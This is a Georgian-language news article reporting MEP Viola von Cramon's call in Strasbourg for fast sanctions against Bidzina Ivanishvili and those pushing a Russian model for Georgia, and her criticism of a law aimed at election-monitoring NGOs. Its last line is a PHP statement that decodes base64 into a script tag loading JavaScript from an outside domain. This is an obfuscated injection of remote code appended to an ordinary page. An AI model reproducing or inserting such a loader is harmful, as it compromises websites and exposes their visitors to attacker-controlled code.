celsiusi
ავერსი შნაიდერი

 იმ ადამიანების წინააღმდეგ, რომლებსაც საქართველოს სხვა გზით გარდაქმნა, ტრანსოფრმაცია და აშენება, რუსული მოდელის მიხედვით სურთ, რაც შეიძლება სწრაფად უნდა დავაწესოთ სანქციები, – ამის შესახებ ევროპარლამენტარმა ვიოლა ფონ კრამონმა სტრასბურგში, ევროპარლამენტარებთან, ანა ფოტიგასთან, პეტრას აუსტრევიჩუსთან და პარტია „ახალის“ ლიდერ ნიკა გვარამიასთან ერთობლივ პრესკონფერენციაზე განაცხადა.

მისი თქმით, „კანონის სამიზნეა ის არასამთავრობო ორგანიზაციები, რომლებიც არჩევნებს აკვირდებიან, ავლენენ ხარვეზებს, გაყალბებასა და არჩევნების ბოროტად გამოყენებას“.

„გარკვეული პერიოდი  არასამთავრობო ორგანიზაციების დისკრედიტაცია მიმდინარეობდა, მაგრამ ახლა ამ კუთხით დევნის ფაქტორიც ჩნდება“, – განაცხადა ევროპარლამენტარმა.

ვიოლა ფონ კრამონი აცხადებს, რომ „ბიძინა ივანიშვილის წინააღმდეგ თუ სანქციები დაწესდა, მას აქვს ბერკეტი, ოფშორებიდან აქტივები და ფული გადაიტანოს, ამიტომ სანქციები რაც შეიძლება სწრაფად უნდა დაწესდეს“.

„მეორე, თუ ივანიშვილის წინააღმდეგ სანქციები დაწესდება, ივანიშვილს აქვს ბერკეტი, ოფშორული ანგარიშებიდან თავისი აქტივები და ფული გადაიტანოს. ეს არის მეორე კანონი, რომელსაც კენჭი გასულ კვირას უყარეს. რისი გაკეთება შეგვიძლია? ვფიქრობ, სანქციები რაც შეიძლება სწრაფად უნდა დავაწესოთ, რომლებიც მიმართული იქნება იმ ადამიანების წინააღმდეგ, რომლებსაც საქართველოს სხვა გზით გარდაქმნა სურთ, რომლებსაც საქართველოს ტრანსოფრმაცია რუსული მოდელის მიხედვით სურთ. ეს მიუღებელია. ასვე, ჩვენ არ უნდა ვიყოთ მოტყუებულები „ქართული ოცნების“ მიერ. თუ გახსოვთ, პრემიერ-მინისტრის ბოლო ვიზიტი ბერლინში. მას უკვე აღარ შეეძლო კრიტიკის ატანა. მას არ შეეძლო კრიტიკის მოსმენა გერმანიის კანცლერისგანაც და თარჯიმანს ადანაშაულებდა, რომ სწორად არ თარგმნა ტექსტი და გამოსვლები. ჩვენ ძალიან დიდი ყურადღებით ვაკვირდებით საქართველოში მიმდინარე ვითარებას და არ მივცემთ „ქართულ ოცნებას“ ჩვენი მოტყუების საშუალებას“, – განაცხადა ვიოლა ფონ კრამონმა.

 
138
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");